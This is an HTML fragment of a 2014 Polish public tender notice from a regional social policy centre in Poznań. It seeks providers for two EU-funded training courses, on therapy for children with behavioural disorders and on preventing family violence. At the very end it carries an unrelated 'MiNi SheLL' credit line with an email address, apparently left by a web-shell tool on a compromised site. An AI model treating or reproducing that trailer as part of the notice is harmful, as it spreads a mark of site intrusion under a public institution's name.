<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zawarte są we wzorach umowy tj.: w Załączniku Nr 5.1. do SIWZ dla Części 1, Załączniku Nr 5.2. do SIWZ dla Części 2</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rops.poznan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalny Ośrodek Polityki Społecznej w Poznaniu, ul. Nowowiejskiego 11, 61-731 Poznań pok. 318.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2014 godzina 09:00, miejsce: Regionalny Ośrodek Polityki Społecznej w Poznaniu, ul. Nowowiejskiego 11, 61-731 Poznań pok. 208 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> świadczenie usług szkoleniowych w ramach projektu systemowego pn. Podnoszenie kwalifikacji kadr pomocy i integracji społecznej w Wielkopolsce, Działanie 7.1.3. Programu Operacyjnego Kapitał Ludzki współfinansowanego z Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie szkolenia pod nazwą: Terapia zajęciowa dla dzieci 
z zaburzeniami zachowania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cel szkolenia: Celem szkolenia jest wyposażenie uczestników w kompetencje niezbędne do rozpoznawania przyczyn zaburzeń zachowania dzieci i młodzieży oraz do świadczenia skutecznej pomocy (poprzez doskonalenie swojego warsztatu pracy) w przezwyciężaniu trudności w ich funkcjonowaniu społecznym. 

Zakres tematyczny:
Wprowadzenie:
zdrowie psychiczne a zaburzenia zachowania u dzieci, 
źródła i mechanizmy zachowań niedostosowanych społecznie,
diagnoza zaburzeń zachowań dziecka w kontekście jego rodziny i otoczenia społecznego, 
z uwzględnieniem m.in. takich czynników jak postawy wobec autorytetu, relacje interpersonalne, rozwój kompetencji psychospołecznych. 
Terapia zajęciowa:
metodyka pracy z dzieckiem z zaburzeniami zachowania - zasady przygotowania i tworzenia scenariuszy zajęć warsztatowych oraz treningowych, indywidualnych i grupowych,
wykorzystanie metod aktywizujących w poszerzaniu warsztatu pracy terapeutycznej (pedagogika zabawy),
przykłady zajęć terapeutycznych np.: arteterapia, zajęcia relaksacyjne,
profilaktyka zaburzeń zachowania u dzieci.
Sposób organizacji szkolenia: Wykonawcy ubiegający się o realizację niniejszego zamówienia zobowiązują się zorganizować i przeprowadzić nie więcej niż 6 trzydniowych edycji szkoleń, w wymiarze 21 godzin dydaktycznych dla każdej edycji (przy założeniu, że jedna godzina zajęć dydaktycznych to 45 minut), dla 120 osób, w podziale na grupy (edycje) liczące maksymalnie 20 osób, wraz z zapewnieniem uczestnikom poszczególnych edycji dowozu, zakwaterowania oraz wyżywienia. 
Materiały szkoleniowe: Wykonawca zobowiązany jest zapewnić każdemu uczestnikowi materiały szkoleniowe wraz ze szczegółowym harmonogramem zajęć, w formie papierowej i na nośniku elektronicznym. Materiały szkoleniowe zostaną przekazane Zamawiającemu do akceptacji nie później niż 3 dni przed podpisaniem umowy. Materiały powinny być przekazane do akceptacji w wersji ostatecznej. Jeden komplet materiałów Wykonawca przekaże Zamawiającemu w momencie podpisania umowy. 
Rekrutacja i obsługa administracyjna: Współpraca z Zamawiającym w zakresie naboru kandydatów na szkolenie i tworzenie listy uczestników oznacza:
nawiązanie kontaktu Wykonawcy z jednostkami pomocy i integracji społecznej w Wielkopolsce 
i, na podstawie otrzymanych tą drogą zgłoszeń, przeprowadzenie wstępnej kwalifikacji uczestników szkolenia oraz sporządzenie listy kandydatów do grupy, 
przekazanie sporządzonej listy kandydatów Zamawiającemu w celu uzyskania jej akceptacji. Dostarczenie ww. listy musi nastąpić na 2 dni przed terminem rozpoczęcia każdej edycji, 
poinformowanie kandydatów, po otrzymaniu od Zamawiającego akceptacji zgłoszonych uczestników, o zakwalifikowaniu się na szkolenie. 
Wykonawca dokonuje ww. czynności posługując się formularzami przygotowanymi przez Zamawiającego i z wykorzystaniem danych kontaktowych udostępnionych przez Zamawiającego (baza e-mail jednostek pomocy i integracji społecznej w Wielkopolsce).
Zamawiający prowadzi działania wspierające działania Wykonawcy w formie ogłoszeń, listów oraz informacji na stronie internetowej. Mają one na celu promowanie szkolenia i informowanie 
o szkoleniu jednostek pomocy społecznej w Wielkopolsce.
Organizacja szkolenia
Dojazd: Wykonawca jest zobowiązany zorganizować dojazd uczestników na każdą edycję:
pierwszego dnia z miejsca zbiórki uczestników szkolenia do miejsca, w którym realizowane będzie szkolenie oraz po zakończeniu edycji powrót do miejsca zbiórki. Miejscem zbiórki uczestników szkolenia jest Dworzec Letni w Poznaniu, ul. Dworcowa 1.
Zakwaterowanie: Wykonawca jest zobowiązany zapewnić zakwaterowanie uczestników poszczególnych edycji w pokojach 2 lub 1 osobowych, w hotelu trzygwiazdkowym lub ośrodku rekreacyjno-szkoleniowym spełniającym standard hotelu trzygwiazdkowego, położonym 
w woj. wielkopolskim, w tym w mieście Poznaniu. 
Sale szkoleniowe: Wykonawca powinien zapewnić uczestnikom szkolenia warunki do nauki 
w oparciu o zasady BHP. 
Wyżywienie: Wyżywienie powinno spełniać wymogi aktualnych wytycznych Instytutu Żywności i Żywienia, a dostarczane posiłki powinny zapewniać 100% całodziennego zapotrzebowania na energię i składniki odżywcze.
Wykonawca zobowiązany jest zapewnić uczestnikom każdej edycji: 
pierwszego dnia - obiad dwudaniowy z napojem oraz kolację integracyjną,
drugiego dnia - śniadanie, obiad dwudaniowy z napojem, kolację,
trzeciego dnia - śniadanie, obiad dwudaniowy z napojem,
2 serwisy konferencyjne w każdym dniu szkolenia, składające się z kawy, herbaty, wody mineralnej, soków, owoców; np. jabłko lub banan, wyrobów cukierniczych.
Szczegółowy opis przedmiotu zamówienia zawarty jest w Załączniku nr 1.1. do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.11.00.00-4, 55.12.00.00-7, 55.30.00.00-3, 60.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Doświadczenie w przygotowywaniu (szkoleniu) osób do prowadzenia warsztatów terapii zajęciowej dla dzieci i młodzieży z zaburzeniami zachowania - 30</li>
<li>3. Doświadczenie zawodowe w pracy z dziećmi i młodzieżą z zaburzeniami zachowania - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie szkolenia pod nazwą: Przeciwdziałanie przemocy 
w rodzinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cel szkolenia: 
Celem szkolenia jest dostarczenie uczestnikom wiedzy i umiejętności z zakresu pomocy interwencyjnej, psychologicznej i terapeutycznej osobom uwikłanym w przemoc - ofiarom, świadkom i sprawcom przemocy w rodzinie.
Zakres tematyczny: 
Moduł I
Przemoc wobec dzieci: przyczyny, formy, czynniki ryzyka.
Specyfika rozwoju i zachowania dziecka doświadczającego przemocy w rodzinie. 
Konsekwencje doświadczania przemocy oraz bycia świadkiem przemocy w rodzinie dla rozwoju dziecka.
Wywiad z osobą wspierającą dziecko w rodzinie.
Wykorzystywanie seksualne dzieci.
Kazirodztwo.
Postępowanie wobec dziecka krzywdzonego/wykorzystywanego seksualnie.
Pomoc terapeutyczna dziecku krzywdzonemu i wykorzystywanemu seksualnie oraz jego rodzinie.
Moduł II
Wykorzystywanie superwizji jako metody doskonalącej warsztat pracy.
Charakterystyka sylwetki superwizora. 
Korzyści wynikające ze stosowania superwizji.
Warsztaty: superwizowanie własnych przypadków uczestników szkolenia.
Sposób organizacji szkolenia: 
Wykonawcy ubiegający się o realizację niniejszego zamówienia zobowiązują się zorganizować i przeprowadzić jedną edycję, 21-godzinnego szkolenia (przy założeniu, że jedna godzina zajęć dydaktycznych to 45 minut), dla 25 uczestników wraz z zapewnieniem uczestnikom dowozu, zakwaterowania oraz wyżywienia. Zajęcia będą prowadzone przez minimum jednego szkoleniowca.
Materiały szkoleniowe: 
Wykonawca zobowiązany jest zapewnić każdemu uczestnikowi materiały szkoleniowe wraz ze szczegółowym harmonogramem zajęć, w formie papierowej i na nośniku elektronicznym. Materiały szkoleniowe zostaną przekazane Zamawiającemu do akceptacji nie później niż 3 dni przed podpisaniem umowy. 
Rekrutacja i obsługa administracyjna: 
Wykonawca zobowiązany jest do współpracy z Zamawiającym w zakresie naboru kandydatów na szkolenie. Oznacza to: nawiązanie kontaktu Wykonawcy z osobami znajdującymi się na liście kandydatów przekazanej przez Zamawiającego, przekazanie sporządzonej listy kandydatów Zamawiającemu w celu uzyskania jej akceptacji. Dostarczenie ww. listy musi nastąpić na 2 dni przed terminem rozpoczęcia każdej edycji szkolenia, poinformowanie kandydatów; po otrzymaniu od Zamawiającego akceptacji zgłoszonych uczestników, o zakwalifikowaniu się na szkolenie. Wykonawca dokonuje ww. czynności posługując się formularzami przygotowanymi przez Zamawiającego 
i z wykorzystaniem danych kontaktowych udostępnionych przez Zamawiającego.
Organizacja szkolenia
Dojazd: 
Miejscem zbiórki uczestników szkolenia jest Dworzec Letni w Poznaniu, ul. Dworcowa 1.
Wykonawca jest zobowiązany zorganizować dojazd uczestników na szkolenie: pierwszego dnia 
z miejsca zbiórki uczestników do miejsca, w którym realizowane będzie szkolenie oraz po zakończeniu powrót na Dworzec Letni w Poznaniu. 
Zakwaterowanie: 
Wykonawca jest zobowiązany zapewnić zakwaterowanie uczestników szkolenia w pokojach 2 lub 1 osobowych, w hotelu trzygwiazdkowym lub ośrodku rekreacyjno-szkoleniowym spełniającym standard hotelu trzygwiazdkowego, położonym w woj. wielkopolskim, w tym w mieście Poznaniu. 
Sale szkoleniowe: 
Wykonawca powinien zapewnić uczestnikom szkolenia warunki do nauki w oparciu o zasady BHP. 
Wyżywienie: 
Wyżywienie powinno spełniać wymogi aktualnych wytycznych Instytutu Żywności i Żywienia, 
a dostarczane posiłki powinny zapewniać 100% całodziennego zapotrzebowania na energię i składniki odżywcze.
Wykonawca zobowiązany jest zapewnić uczestnikom podczas szkolenia: 
pierwszego dnia - obiad dwudaniowy z napojem oraz kolację integracyjną, drugiego dnia - śniadanie, obiad dwudaniowy z napojem, kolację, trzeciego dnia - śniadanie, obiad dwudaniowy z napojem, 
2 serwisy konferencyjne w każdym dniu szkolenia, 
Szczegółowy opis przedmiotu zamówienia zawarty jest w Załączniku nr 1.2. do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.11.00.00-4, 55.12.00.00-7, 55.30.00.00-3, 60.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Doświadczenie w prowadzeniu szkoleń z zakresu przeciwdziałania przemocy w rodzinie - 20</li>
<li>3. Doświadczenie zawodowe w zakresie przeciwdziałania przemocy w rodzinie - 20</li>
<li>4. Posiadane certyfikaty - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com